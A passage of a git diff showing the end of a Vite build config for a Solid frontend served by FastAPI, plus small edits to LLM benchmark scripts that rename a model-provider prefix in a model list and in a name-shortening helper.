stats.isDirectory(), force: true }); + } + + cpSync(outDir, staticDir, { recursive: true }); + }, + }; +} + +export default defineConfig({ + plugins: [solid(), tailwindcss(), syncStaticBundle()], + base: "/static/", + build: { + outDir, + emptyOutDir: true, + target: "es2022", + sourcemap: false, + cssCodeSplit: false, + assetsInlineLimit: 0, + rollupOptions: { + output: { + // Hashed filenames so FastAPI can cache `/static/*` aggressively in + // future; today the bundle is small enough that one chunk is fine. + entryFileNames: "assets/[name]-[hash].js", + chunkFileNames: "assets/[name]-[hash].js", + assetFileNames: "assets/[name]-[hash][extname]", + }, + }, + }, + server: { + port: 5173, + strictPort: false, + proxy: { + "/api": "http://localhost:8080", + "/healthz": "http://localhost:8080", + "/readyz": "http://localhost:8080", + "/events": "http://localhost:8080", + "/issues": "http://localhost:8080", + }, + }, +}); diff --git a/scripts/bench-edit-hashline-sep.ts b/scripts/bench-edit-hashline-sep.ts index 3e9779157..b89e1f69e 100644 --- a/scripts/bench-edit-hashline-sep.ts +++ b/scripts/bench-edit-hashline-sep.ts @@ -17,7 +17,7 @@ const SEPARATORS = ["~", "%", "÷", ">", ":"] as const; const MODELS = [ "openrouter/z-ai/glm-4.7:nitro", "openai/gpt-5.4-nano", - "p-anthropic/claude-sonnet-4-6", + "anthropic/claude-sonnet-4-6", ] as const; const CONCURRENCY = 3; diff --git a/scripts/eval-bench-runs.ts b/scripts/eval-bench-runs.ts index fcf29375d..5b0777fd2 100644 --- a/scripts/eval-bench-runs.ts +++ b/scripts/eval-bench-runs.ts @@ -205,8 +205,7 @@ function fmtNum(value: number): string { } function shortModel(model: string): string { - const cleaned = model.replace(/^p-anthropic\//, "anthropic/"); - const segs = cleaned.split("/"); + const segs = model.split("/"); return segs[segs.length - 1].replace(/:nitro/, ""); }